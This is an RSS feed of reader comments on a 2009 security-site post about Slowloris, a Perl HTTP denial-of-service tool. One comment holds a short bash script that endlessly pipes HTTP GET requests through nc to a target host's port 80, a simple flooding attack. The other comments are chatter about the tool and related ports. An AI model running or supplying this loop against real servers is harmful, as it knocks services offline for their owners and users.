<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Slowloris &#8211; HTTP DoS Tool in PERL</title>
	<atom:link href="http://www.darknet.org.uk/2009/06/slowloris-http-dos-tool-in-perl/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.darknet.org.uk/2009/06/slowloris-http-dos-tool-in-perl/</link>
	<description>Ethical Hacking, Penetration Testing &#38; Computer Security</description>
	<lastBuildDate>Sat, 21 Nov 2009 06:04:59 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.6</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Jeff Price</title>
		<link>http://www.darknet.org.uk/2009/06/slowloris-http-dos-tool-in-perl/#comment-158138</link>
		<dc:creator>Jeff Price</dc:creator>
		<pubDate>Wed, 24 Jun 2009 18:38:14 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/?p=1863#comment-158138</guid>
		<description>I wrote this version a few years ago in bash

#!/bin/bash
while true; do
printf &quot;GET / HTTP/1.0\n&quot;&#124;nc $1 80 &amp;
done</description>
		<content:encoded><![CDATA[<p>I wrote this version a few years ago in bash</p>
<p>#!/bin/bash<br />
while true; do<br />
printf &#8220;GET / HTTP/1.0\n&#8221;|nc $1 80 &amp;<br />
done</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: droope</title>
		<link>http://www.darknet.org.uk/2009/06/slowloris-http-dos-tool-in-perl/#comment-158134</link>
		<dc:creator>droope</dc:creator>
		<pubDate>Wed, 24 Jun 2009 02:41:34 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/?p=1863#comment-158134</guid>
		<description>uh, that seems like a fun tool. 

I can smell all fellow script kiddies enjoying this.</description>
		<content:encoded><![CDATA[<p>uh, that seems like a fun tool. </p>
<p>I can smell all fellow script kiddies enjoying this.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: David</title>
		<link>http://www.darknet.org.uk/2009/06/slowloris-http-dos-tool-in-perl/#comment-158131</link>
		<dc:creator>David</dc:creator>
		<pubDate>Tue, 23 Jun 2009 18:12:18 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/?p=1863#comment-158131</guid>
		<description>Another great sharing from RSnake. Tool very well developed and I already tested with success on my home pen-testing. Top of the news!</description>
		<content:encoded><![CDATA[<p>Another great sharing from RSnake. Tool very well developed and I already tested with success on my home pen-testing. Top of the news!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Motoma</title>
		<link>http://www.darknet.org.uk/2009/06/slowloris-http-dos-tool-in-perl/#comment-158130</link>
		<dc:creator>Motoma</dc:creator>
		<pubDate>Tue, 23 Jun 2009 18:08:49 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/?p=1863#comment-158130</guid>
		<description>There is a python version of this titled PyLoris which runs in Windows, Linux, and Mac OS X.</description>
		<content:encoded><![CDATA[<p>There is a python version of this titled PyLoris which runs in Windows, Linux, and Mac OS X.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Greg</title>
		<link>http://www.darknet.org.uk/2009/06/slowloris-http-dos-tool-in-perl/#comment-158128</link>
		<dc:creator>Greg</dc:creator>
		<pubDate>Tue, 23 Jun 2009 10:06:34 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/?p=1863#comment-158128</guid>
		<description>As i saw it appearing on Milw0rm, i knew this will be a headliner :)</description>
		<content:encoded><![CDATA[<p>As i saw it appearing on Milw0rm, i knew this will be a headliner <img src='http://www.darknet.org.uk/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
</channel>
</rss>
